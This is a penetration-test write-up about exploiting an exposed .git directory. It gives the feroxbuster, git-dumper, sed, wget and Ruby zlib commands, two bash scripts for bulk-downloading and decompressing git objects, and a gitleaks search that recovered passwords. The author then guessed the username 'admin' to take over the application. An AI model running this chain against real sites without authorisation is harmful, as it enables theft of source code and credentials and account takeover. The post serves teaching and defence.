Every penetration test begins with reconnaissance, and my initial steps always involve looking for potentially interesting endpoints. During one engagement, I encountered an exposed .git endpoint, and in this post I will discuss how I exploited it to gain admin-level access to the application.
While running feroxbuster for content discovery, I discovered a .git endpoint on the application. This exposed several files, but more importantly, it revealed the /objects folder. This folder could potentially leak source code containing credentials, secrets, and other sensitive information. Additionally, examining or scanning the code could reveal further vulnerabilities, which we will discuss later.
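For reference, the content discovery step looked something like the command below; the target URL, wordlist path, and output filename are illustrative placeholders rather than the actual values from the engagement. Any hit on paths such as /.git/HEAD or /.git/config is a strong sign that the repository metadata is exposed.
feroxbuster -u http://website.com -w /usr/share/wordlists/dirb/common.txt -o ferox_results.txt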
I used git-dumper to extract the contents of the /objects directory, saving the output to a file. However, this process only retrieved each object’s URL, not the actual object files.
git-dumper http://website.com/.git ~/website >> file.txt
The output file contained some gibberish that I had to filter out to create a clean file with only the URLs for the next step.
sed 's/.*\(https:\/\/.*\)/\1/' file.txt >> clean_file.txt
After this, I created a bash script to access all the URLs in the file and download the objects into a folder.
#!/bin/bash

# Directory to save the downloaded files
DOWNLOAD_DIR="objects"
# File containing the URLs
URLS_FILE="clean_file.txt"
# Create the directory if it does not exist
mkdir -p "$DOWNLOAD_DIR"
# Read each URL from the file and download the file
while IFS= read -r url; do
echo "Downloading from $url"
# wget to download the file from the URL
wget "$url" -P "$DOWNLOAD_DIR/"
done < "$URLS_FILE"
echo "Download completed."
Git stores its objects zlib-compressed, so to read their content in plain text, you first need to decompress them. I used Ruby to decompress the objects.
ruby -rzlib -e 'print Zlib::Inflate.new.inflate(STDIN.read)' < object
Reading hundreds of files individually would take a very long time. Therefore, after downloading the objects, I wrote another script to access each file in the folder, decompress the objects using Ruby, and save the clear text representation into a different file for later use.
#!/bin/bash

# Directory with the files to process
INPUT_DIR="objects"
# Output file base name
OUTPUT_BASE="code"
# Counter for output file naming
count=1
# Process each file in the directory
for file in "$INPUT_DIR"/*; do
    if [[ -f $file ]]; then
        # Apply the Ruby command to the file and save the output
        ruby -rzlib -e 'print Zlib::Inflate.new.inflate(STDIN.read)' < "$file" > "${OUTPUT_BASE}${count}"
        # Increment the file counter
        ((count++))
    fi
done
echo "Processing completed."
Now that I had all the objects saved in clear text files, I used gitleaks to search for hardcoded credentials and secrets.
gitleaks detect --source='<location of the directory>' --no-git -v
Sure enough, this yielded results in a matter of seconds, finding two passwords.
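If you want the findings in a machine-readable form for later triage, gitleaks can also write a report file; a possible invocation, assuming the decompressed files live in a directory named code:
gitleaks detect --source=code --no-git -v --report-path gitleaks_report.json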
I did not have a username to use with the passwords, but I made an educated guess that “admin” might work. Using the passwords with the username “admin” granted access to the application as an admin user, fully compromising it.
Having access to hundreds of files containing the application’s source code, I could have manually read through the code to find other vulnerabilities. However, this would take a lot of time. As a quicker solution, I used the Snyk extension for VS Code to automatically scan for potential vulnerabilities.
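For completeness, a similar scan can be run from the command line with the Snyk CLI; a minimal sketch, assuming the CLI is installed and authenticated and you are inside the directory containing the recovered source:
snyk code test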
In this blog post, we explored how an exposed .git directory can lead to a major security breach. By using tools like feroxbuster, git-dumper, gitleaks, and some bash scripting, we demonstrated how to extract sensitive information, such as hardcoded credentials from the application’s source code, which allowed us to gain admin-level access to the application. The key takeaway is the importance of securing your .git directories and regularly scanning your codebase for vulnerabilities and secrets to help prevent such compromises.
I hope you enjoyed this blog post. Stay curious, and see you next time!